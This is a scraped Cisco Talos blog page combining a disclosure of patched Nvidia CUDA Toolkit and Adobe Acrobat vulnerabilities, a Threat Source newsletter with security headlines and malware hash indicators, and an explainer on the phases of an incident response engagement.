Cisco Talos is disclosing details on UAT-8099, a Chinese-speaking cybercrime group mainly involved in SEO fraud and theft of high-value credentials, configuration files, and certificate data.

UAT-8099: Chinese-speaking cybercrime group targets high-value IIS for SEO fraud

Cisco Talos’ Vulnerability Discovery & Research team recently disclosed five vulnerabilities in Nvidia and one in Adobe Acrobat.
The vulnerabilities mentioned in this blog post have been patched by their respective vendors, all in adherence to Cisco’s third-party vulnerability disclosure policy.    
For Snort

Wednesday, October 1, 2025 14:37

Cisco Talos’ Vulnerability Discovery & Research team recently disclosed five vulnerabilities in Nvidia and one in Adobe Acrobat.

The vulnerabilities mentioned in this blog post have been patched by their respective vendors, all in adherence to Cisco’s third-party vulnerability disclosure policy.    

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.     

****Nvidia vulnerabilities****

_Discovered by Dimitrios Tatsis of Cisco Talos._

Nvidia is a large technology company developing graphics cards, chip systems, and applications for AI and high performance computing. Talos has found 5 vulnerabilities in the CUDA Toolkit, a development environment for developing GPU-accelerated applications.

TALOS-2025-2155 (CVE-2025-23339) is an arbitrary code execution vulnerability in the DWARF parsing functionality of NVIDIA cuobjdump 12.8.55. A specially crafted fatbin file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.

TALOS-2025-2169 (CVE-2025-23338) is an improper array index validation vulnerability in the symbol table parsing functionality of NVIDIA nvdisasm 12.8.90. A specially crafted ELF file can lead to an out-of-bounds write. An attacker can provide a malicious file to trigger this vulnerability.

TALOS-2025-2172 (CVE-2025-23340) is an out-of-bounds write vulnerability in the RELA section parsing functionality of NVIDIA nvdisasm 12.8.90. A specially crafted ELF file can lead to code execution. An attacker can provide a malicious file to trigger this vulnerability.

TALOS-2025-2191 (CVE-2025-23271), a heap-based buffer overflow vulnerability, and TALOS-2025-2204 (CVE-2025-23308), an out-of-bounds write vulnerability, exist in the REL section header parsing functionality of NVIDIA nvdisasm 12.8.90. Specially crafted ELF files can lead to arbitrary code execution. An attacker can provide a malicious file to trigger these vulnerabilities.

****Adobe use-after-free vulnerability****

_Discovered by KPC of Cisco Talos._

Adobe Acrobat Reader is one of the most popular PDF reading software currently available.

Talos discovered TALOS-2025-2222 (CVE-2025-54257), a use-after-free vulnerability in the page property functionality of Adobe Acrobat Reader 2025.001.20531. Specially crafted Javascript code inside a malicious PDF document can trigger reuse of a previously freed object, which can lead to memory corruption and could result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability.

Nvidia and Adobe vulnerabilities

Hazel celebrates unseen effort in cybersecurity and shares some PII. Completely unrelated, but did you know “Back to the Future” turns 40 this year?

Welcome to this week’s edition of the Threat Source newsletter. 

“Back to the Future” is 40 years old this year, and at the risk of giving away sensitive information to an audience of hackers… so am I. 

I don’t really know what 40 is supposed to feel like. Honestly, I don’t feel all that different from my 20s, with two key exceptions: One, I care a whole lot less about what people think of me. And two, my trainer recently stopped mid-set to ask, “Was that your knee making that sound?” 

I’ve always loved “Back to the Future” (mommy issues aside). For my 30th birthday, I threw a BTTF-themed party. Guests had to dress for either 1955, 1985 or 1885. (2015 was also allowed, but only if you wore two ties.) 

But watching the documentary “Still” recently gave me a whole new appreciation for what Michael J. Fox went through to make it happen. 

Because he was still under contract with “Family Ties,” and because the original Marty had been fired five weeks into filming, Fox had to shoot both projects _at the same time._ He’d wrap “Back to the Future “at 2:00 a.m., sleep in the back of a car, then be on set for the sitcom a few hours later. 

In “Still,” he talks about mixing up lines between scripts, barely functioning from exhaustion and constantly fearing a call from his agent saying he wasn’t doing a good job. The pressure. The pace. The fear he was messing it up. Fox himself admits the experience nearly broke him. But he kept showing up, because people were counting on him. 

Sound familiar? 

That “I can’t stop, people are relying on me” mindset is something I see a lot in this industry. We care about the mission. We care about our teams. We don’t want to give the adversary any opportunity.  

So we say yes. We log back in. We fix the thing no one else will notice, but we know it matters. 

Fox’s schedule and resultant exhaustion weren’t the only issues behind the scenes of “Back to the Future.” The “What Went Wrong” podcast (a favourite of mine) recently covered the mishaps and difficulties, from the DeLorean doors constantly jamming shut, to having to change the entire ending. The film was originally supposed to climax at a nuclear test site, with Marty manufacturing a time machine out of a fridge.  

That ending was axed as the producers were concerned children would copy the idea and get trapped in fridges. Thankfully, Steven Spielberg (a producer on the film) would use the concept 20 years later in “Indiana Jones and the Kingdom of the Crystal Skull” to huge success. Ahem.  

So much about the making of “Back to the Future” was fraught and uncertain. But what we, the audience, saw was pure delight. And that’s the thing — what looks effortless on the surface is often the result of long hours, unfair compromises, and the kind of behind-the-scenes effort that nobody ever sees. 

I want to echo the thoughts of my colleague Joe from last week’s newsletter: B**urnout is brutal, a**nd it takes no prisoners. Trying to be there for everyone and everything all the time is unsustainable. And (trust me on this one), the longer we put off taking care of ourselves, the harder and longer the recovery.  

Creating boundaries is one of the best things we can do for ourselves. So, this week, whether you're coordinating an incident, researching something cool, supporting your team or just trying to be a functioning human, give yourself a moment. Identify your boundaries. Move them closer if you need to.  

In fact, write down just one thing that will help decompress you this week, and do that thing. Whether that’s less screen time, a short walk after dinner or playing a game.  

Just… give yourself permission, okay? As Doc Brown says: 

“The future is whatever you make it. So make it a good one.”

**The one big thing **

Cisco Talos uncovered a new PlugX malware variant targeting telecom and manufacturing sectors in Central and South Asia since 2022, using the same sneaky tactics as the RainyDay and Turian backdoors. These threats abuse legitimate software and share unique technical fingerprints, suggesting they're the work of the same or closely linked attackers. The campaign shows a high level of sophistication and ongoing risk for targeted industries. 

**Why do I care? **

If your organization is in telecom or manufacturing, especially in Central or South Asia, you’re squarely in the crosshairs of advanced attackers using updated, evasive malware that can compromise your systems, steal data and lurk undetected for years. 

Even if you’re in a different industry, attackers are getting smarter at hiding in plain sight and any organization could be at risk if these tactics spread. 

**So now what? **

Double down on security controls. Make sure your endpoint, email and network protection solutions are up to date, review your defenses against DLL hijacking and stay alert for new updates.

**Top security headlines of the week **

**Microsoft fixed Entra ID vulnerability allowing Global Admin impersonation**   
Microsoft rolled out a global fix on July 17, just three days after the initial report and later added further mitigations that block applications from requesting Actor tokens for the Azure AD Graph. (HackRead) 

**U.S. Secret Service dismantles imminent telecommunications threat in New York tristate area**   
The U.S. Secret Service dismantled a network of electronic devices located throughout the New York tristate area that were used to conduct multiple telecommunications-related threats directed towards senior U.S. government officials. (U.S. Secret Service) 

**European airport disruptions caused by ransomware attack**    
ENISA said the type of ransomware involved in the attack has been identified and law enforcement is conducting an investigation. The cyberattack hit services provided by US-based Collins Aerospace, which is owned by RTX (formerly Raytheon). (SecurityWeek) 

**ChatGPT targeted in server-side data theft attack**   
The attack, dubbed ShadowLeak, targeted ChatGPT’s Deep Research capability, which is designed to conduct multi-step research for complex tasks. OpenAI neutralized ShadowLeak after notification. (SecurityWeek) 

**Attackers abuse AI tools to generate fake CAPTCHAs in phishing attacks**   
The fake CAPTCHA pages redirect victims to malicious websites hosted by the attackers. The apparent routine security check makes the malicious link appear more legitimate to the victim and helps bypass security tools. (Infosecurity Magazine) 

**SystemBC malware turns infected VPS systems into proxy highway**   
The operators of the SystemBC proxy botnet are hunting for vulnerable commercial virtual private servers (VPS) and maintain an average of 1,500 bots every day that provide a highway for malicious traffic. (Bleeping Computer)

**Can’t get enough Talos? **

**The TTP: Threat Hunter’s Cookbook**   
Hear from Ryan Fetterman and Sydney Marrone from the SURGe team (now part of Cisco’s Foundation AI group), who wrote the Threat Hunter’s Cookbook: a collection of practical “recipes” security teams can pick up and apply. 

**Engaging Cisco Talos Incident Response**   
You’ve called Talos IR about a cyber incident — now what happens? This blog post takes you behind the scenes of a Talos IR engagement, from picking up the phone to recovery and implementation of long-term security improvements. 

**Tampered Chef: When malvertising serves up infostealers**    
Imagine downloading a PDF Editor tool from the internet that works great... until nearly two months later, when it quietly steals your credentials. Nick Biasini explains how cybercriminals are investing in malvertising and challenges in defense.

**Upcoming events where you can find Talos **

*   VB2025 (Sept. 24 – 26) Berlin, Germany 
*   Wild West Hackin' Fest (Oct. 8 – 10) Deadwood, SD 
*   DEEP Conference (Oct. 22 – 23) Petrčane, Croatia

**Most prevalent malware files from Talos telemetry over the past week **

**SHA256: d933ec4aaf7cfe2f459d64ea4af346e69177e150df1cd23aad1904f5fd41f44a**    
MD5: 1f7e01a3355b52cbc92c908a61abf643    
Talos Rep: https://talosintelligence.com/talos\_file\_reputation?s=d933ec4aaf7cfe2f459d64ea4af346e69177e150df1cd23aad1904f5fd41f44a    
Example Filename: cleanup.bat    
Detection Name: W32.D933EC4AAF-90.SBX.TG 

**SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507**    
MD5: 2915b3f8b703eb744fc54c81f4a9c67f    
Talos Rep: https://talosintelligence.com/talos\_file\_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507    
Example Filename: 0a0dc0e95070a2b05b04c2f0a049dad8\_1\_Exe.exe    
Detection Name: Win.Worm.Coinminer::1201 

**SHA256: 57a6d1bdbdac7614f588ec9c7e4e99c4544df8638af77781147a3d6daa5af536**    
MD5: 79b075dc4fce7321f3be049719f3ce27    
Talos Rep: https://talosintelligence.com/talos\_file\_reputation?s=57a6d1bdbdac7614f588ec9c7e4e99c4544df8638af77781147a3d6daa5af536   
Example Filename: RemCom.exe    
Detection Name: W32.57A6D1BDBD-100.SBX.VIOC 

**SHA256: 1e9efd7b2b70a21b49395081f8d70d5e500539abb51a4dd079ffb746f59e43a1**    
MD5: 45f586861cc745a6b29a957fdbc03645    
Talos Rep: https://talosintelligence.com/talos\_file\_reputation?s=1e9efd7b2b70a21b49395081f8d70d5e500539abb51a4dd079ffb746f59e43a1   
Example Filename: cleanup.bat    
Detection Name: W32.1E9EFD7B2B-90.SBX.TG 

**SHA256: 96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974**   
MD5: aac3165ece2959f39ff98334618d10d9 Talos Rep: https://talosintelligence.com/talos\_file\_reputation?s=96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974   
Example Filename: 96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974.exe    
Detection Name: W32.Injector:Gen.21ie.1201

Great Scott, I’m tired

What happens when you bring in a team of cybersecurity responders? How do we turn chaos into control, and what is the long-term value that Talos IR provides to the organizations we work with?

**What happens when you engage Cisco Talos Incident Response?**

Wednesday, September 24, 2025 06:00

In today’s world, cybersecurity incidents are not a matter of if, but **when** and **how**. From ransomware attacks to data breaches exposing sensitive information, organizations face a changing threat landscape. As a result of cybersecurity attacks, organizations can experience downtime, financial losses, reputational damage and regulatory penalties. That’s when it really helps to have a team like Cisco Talos Incident Response (Talos IR) by your side. But what exactly happens when you bring in a team of cybersecurity responders? How do we turn chaos into control, and what is the long-term value that Talos IR provides to the organizations we work with?

This blog post takes you behind the scenes of engaging an incident response (IR) firm like Talos IR. We will walk through what really happens during an IR engagement, from the moment you pick up a phone and call for help in the middle of a crisis to the long-term changes that make your organization stronger and more secure.

**Why engage an IR team? **

Before diving into the process, let’s address the fundamental question: Why engage an IR firm? Cybersecurity incidents are complex, often requiring specialized skills, tools and experience that internal teams may lack. The Talos Year In Review Report highlights the rising frequency and sophistication of attacks; as a result, many security teams are struggling to address emergencies due to resource constraints or the complexity of response at scale. 

Engaging an IR firm like Talos IR brings several key advantages: 

*   **Speed and availability**: We provide 24/7 global support, with response times often under a few hours for remote engagements and on-site support wherever needed. Engaging an IR firm is like calling in a S.W.A.T. team for a cybersecurity crisis. We bring the tools, tactics and experience to contain the threat and minimize damage while guiding the organization toward recovery and increasing future resilience. 
*   **Expertise**: With numerous incident responders and threat intelligence analysts, all of whom have access to industry-leading Talos threat intelligence, the team has deep experience handling diverse threats, from ransomware to business email compromise (BEC). We handle it all, from “small” attacks on a single organization to a country-level threats. We don’t focus just on typical IT environments — we work with ICS/OT, cloud or mobile forensic, as well.  
*   **Vendor-agnostic approach**: Talos IR works with customers’ existing infrastructure and tooling, whether you use Cisco products or not. We simply don’t like to wait for deployment of tools before getting our hands dirty in all the logs, consoles and forensic artifacts. At a time when you are already resource-constrained, the last thing we want to do is make you replace an existing security solution, such as endpoint detection and response (EDR), on the endpoints. 
*   **Comprehensive services**: Beyond emergency response, Talos IR provides proactive services like Threat Hunting and IR Planning to strengthen your security posture before an incident happens or after to build up resilience.

**Overview of the IR lifecycle **

The IR process typically follows a structured lifecycle, based on frameworks such as NIST SP 800-61 or the SANS Institute’s model. Talos IR aligns with these best practices, tailoring its approach to organization’s unique needs at the time of crisis and beyond. Handling incidents day in and day out has given Talos IR a deep well of experience, and we’ve built that knowledge into processes to support every organization we work with. The lifecycle of our IR typically includes: 

1.  Preparation 
2.  Identification 
3.  Containment 
4.  Eradication 
5.  Recovery 
6.  Lessons learned 

When you engage Talos IR, we apply this lifecycle with a blend of technical prowess, threat intelligence and collaborative teamwork. Let’s walk through each phase in detail.

**Phase 1: Preparation (before the incident) **

Preparation is the foundation of effective IR. While many organizations only engage IR firms during a crisis, proactive engagement with Talos IR can significantly reduce the impact of future incidents. With a Talos IR retainer, you secure an agreement that ensures rapid response during an emergency and access to proactive services tailored to your organization’s risk profile and needs, offering: 

*   **Emergency response**: Guaranteed access to a global team within a short time of experiencing of an incident. During major global cybersecurity events like Wannacry, Heartbleed or Log4J or others, an existing retainer can be the difference between receiving immediate help and waiting days to weeks.
*   **Proactive services**: Access to proactive services for Threat Hunting, Tabletop Exercises or Purple Teaming
*   **Relationship building**: Familiarity with your environment, reducing response time during a crisis

These services build trust and familiarity, ensuring Talos IR can hit the ground running during an emergency.

**Phase 2: Identification (beginning of incident) **

When a cybersecurity incident occurs, the first step is identifying and confirming the threat, whether it’s a ransomware attack, phishing campaign, or data breach. This is often when organizations reach out to Talos IR. Talos IR’s emergency response team is available 24/7 and can be reached via phone or email, but phone is the fastest and most direct way to reach our dedicated IR team.  

**Initial call**

During the first call, Talos IR gathers critical information to help us move onto analysis as soon as possible: 

*   **Nature of the incident**: What symptoms were observed (e.g., encrypted files, suspicious emails, new files on the webserver that were committed outside of the development lifecycle)? 
*   **Affected systems**: Which servers, endpoints, or networks are impacted? 
*   **Business impact**: Is the incident disrupting operations or exposing sensitive data? 
*   **Existing actions**: What steps have been taken so far? 
*   **Visibility**: What existing systems and tools can we access to handle the incident? Would complimentary Cisco tools help close a current gap, such as no EDR solution on a specific network? 

**Triage, scoping and analysis** 

Talos IR deploys a team led by an Incident Commander, who coordinates efforts and communicates with the stakeholders. The Incident Commander is supported by a skilled team of responders, threat analysts and project managers who keep everything moving and progress analysis 24/7. We typically start our work with in-depth triage of your environment which often involves: 

*   **Log analysis**: Reviewing logs from security information and event management (SIEM) systems, EDR tools, or network devices to identify indicators of compromise (IOCs)
*   **Threat intelligence**: Leveraging Talos global telemetry to match IOCs against known adversary tactics, techniques and procedures (TTPs)
*   **Digital forensics**: Collecting and analyzing evidence, such as memory dumps or disk images, to understand the attack’s scope

What makes IR truly effective is having access to as much relevant data as possible from the very beginning. The earlier our team can review endpoint telemetry, network traffic, identity logs and other critical data points, the faster we can determine what happened, how far the threat spread and what needs to be done to contain the threat. We often use the triage process to understand and search for: 

*   **Initial access vector**: Common vectors include phishing, exploited vulnerabilities (e.g., Microsoft Exchange Server flaws), or misconfigured VPN servers. You can read all about the trends we see each quarter here. 
*   **Adversary goals**: Is the attacker after data theft, ransomware deployment, or persistent access? 
*   **Scope**: How many systems, users, or networks are affected? 
*   **Persistence mechanisms**: Are there backdoors, scheduled tasks, or web shells that allow re-entry? 
*   **Data exfiltration**: Was sensitive data stolen? 

Talos IR provides an initial assessment, outlining the incident’s severity and recommended next steps, and keeps you updated daily. This phase sets the stage for containment, where speed is critical to limit damage. This analysis goes on for a number of days and typically uncovers additional information that adds to the picture during each 24-hour cycle.

**Phase 3: Containment (stopping the attack) **

Containment focuses on preventing the threat from spreading further while preserving evidence for analysis. Talos IR employs a technology-agnostic approach, working with existing tools to implement short-term and long-term containment strategies while simultaneously looking to minimize business impact. 

**Short-term containment** 

Immediate actions to isolate the threat typically include: 

*   **Network segmentation**: Isolating affected systems or subnets to prevent lateral movement
*   **Account lockdown and/or password changes**: Disabling compromised accounts, changing compromised passwords, or enforcing multi-factor authentication (MFA). Talos IR frequently observes incidents where the lack of MFA enables ransomware or business email compromise (BEC) attacks. 
*   **Process termination**: Isolating malicious processes, such as ransomware encryptors or command-and-control (C2) beacons, when identified. Reimaging devices is often a recommended step, but it depends on the extent of the breach.
*   **Firewall rules**: Blocking malicious IPs or domains identified through Talos’ threat intelligence

**Long-term security hardening** 

While short-term countermeasures stop immediate damage, long-term security hardening ensures the attacker can’t regain access. By working together with an organization on emergency response, Talos IR gains a great understanding of what needs to be applied to build long term resistance. Some of these recommendations would be: 

*   **Patching vulnerabilities**: Addressing exploited flaws, such as unpatched servers or vulnerable web applications
*   **Endpoint protection**: Extending EDR deployments to monitor for residual threats on systems that were previously unprotected
*   **Strengthening resilience:** Taking a long-term, strategic approach to uncover and address weaknesses in your organization’s security posture to better prepared for future threats
*   **Improving efficiency and consistency:** Developing clear policies and procedures, while automating routine tasks such system hardening to reduce risk

**Phase 4: Eradication (removing the threat) **

Once the threat is contained, Talos IR focuses on recommendations for completely removing all remnants of the adversary from the environment. Eradication is a delicate process that needs to balance business needs with recovery operations. Eradication typically involves: 

*   **Account remediation**: Resetting passwords and revoking compromised credentials. This may sound familiar from the containment phase, but often it is necessary to do two or more credential purges during a major incident. 
*   **System rebuilds**: In severe cases, rebuilding affected systems from clean backups to eliminate hidden threats.
*   **Reverting adversary changes**: Some sophisticated adversaries will do things like change firewall rules, embed fileless malware in the registry, or create future scheduled tasks as “sleeper agents.” Detecting, documenting and reverting these changes can be the most difficult and important part of eradication. 

Before wrapping up this phase, Talos IR verifies eradication through: 

*   **Threat hunting**: Scanning for residual IOCs or anomalous behavior
*   **Log reviews**: Confirming no further malicious activity

This process minimizes the risk of the adversary returning, as seen in cases where adversaries used tools like Cobalt Strike to maintain persistence. A single overlooked persistence mechanism is enough to let the adversary back in at a later date, which is why a thorough forensic review by an experienced IR team is critical. 

**Phase 5: Recovery (restoring operations) **

Recovery aims to restore systems and operations to normal while enhancing security to prevent recurrence. Talos IR collaborates with IT and business teams to ensure a smooth transition. If it is necessary to accept some risk in order to get business operations back online, the Talos IR Incident Commander will work with your organizational leadership to ensure that the risk is minimized and understood, and that compensating controls are applied.  

Key recovery recommendations often include: 

*   **Restoring from backups**: Deploying clean backups to affected systems, ensuring they’re free of malware
*   **Application testing**: Verifying critical applications (e.g., ERP systems) function correctly post-recovery
*   **User access**: Gradually restoring user access with strengthened controls, such as MFA
*   **Alternative processes**: Implementing manual or temporary workflows if systems remain offline
*   **Stakeholder communication**: Coordinating with PR and legal teams to manage external messaging and regulatory notifications
*   **Employee training**: Educating staff on phishing awareness or secure practices to prevent future incidents
*   **Logging improvements**: Enhancing visibility to overcome the logging deficiencies
*   **Patch management**: Establishing processes to prevent exploitation of known vulnerabilities

**Phase 6: Lessons learned (building resilience) **

The final phase of IR involves analyzing the incident to extract lessons and improve future preparedness. Talos IR’s approach ensures that insights translate into actionable strategies. Talos IR delivers a comprehensive incident report, including: 

*   **Incident summary**: A timeline of events, from initial detection to resolution 
*   **Findings**: Details on the attacker’s TTPs, entry points and impact
*   **Recommendations**: Specific actions to ensure long-term and short-term improvements

**Ongoing partnership **

At Talos IR, we believe IR isn’t only a service we provide; it’s a relationship and the ultimate team sport. We’re not here just for the crisis; we’re here to support before, during and long after the incident is resolved. As many of our long-term retainer customers like Veradigm have observed, those multi-year relationships pay great dividends during incidents:  

_“With the \[Talos IR\] retainer service we really appreciate established and met Service Level Agreements (SLAs). Plus, the knowledge of Cisco’s IR team on our unique environment, prior incidents, and their intelligence on the latest threats ensure we smoothly navigate, and balance preparation exercises and incidents based on our unique needs. Time to response in our SLA along with the unique knowledge, there isn’t a delay as one would expect. They are ready and we have ‘muscle memory’ from both tabletop scenarios and real-life situations. As a result of being in the highly regulated world of healthcare and with the constant need to consider patient safety, our circumstances can be tense from the start. They know how we need to react based on both exercises and incidents and can navigate smoothly in delicate situations/balances with our unique needs in mind,”_ **_Jeremy Maxwell, Veradigm CISO_****_._** 

This is one of many stories we observe during our engagements with different organizations. For Talos IR, once the immediate threat is handled, the real work begins. We help to strengthen your defenses through ongoing support, so your organization is better prepared for the future. We keep the defenders in the loop with up-to-date threat intelligence, and we run regular training and drills to make sure that various teams know exactly what to do if something happens again. 

It’s a partnership built on trust, experience and a shared goal: keeping your organization resilient in a constantly evolving threat landscape.

What happens when you engage Cisco Talos Incident Response?

Talos discovered that a new PlugX variant’s features overlap with both the RainyDay and Turian backdoors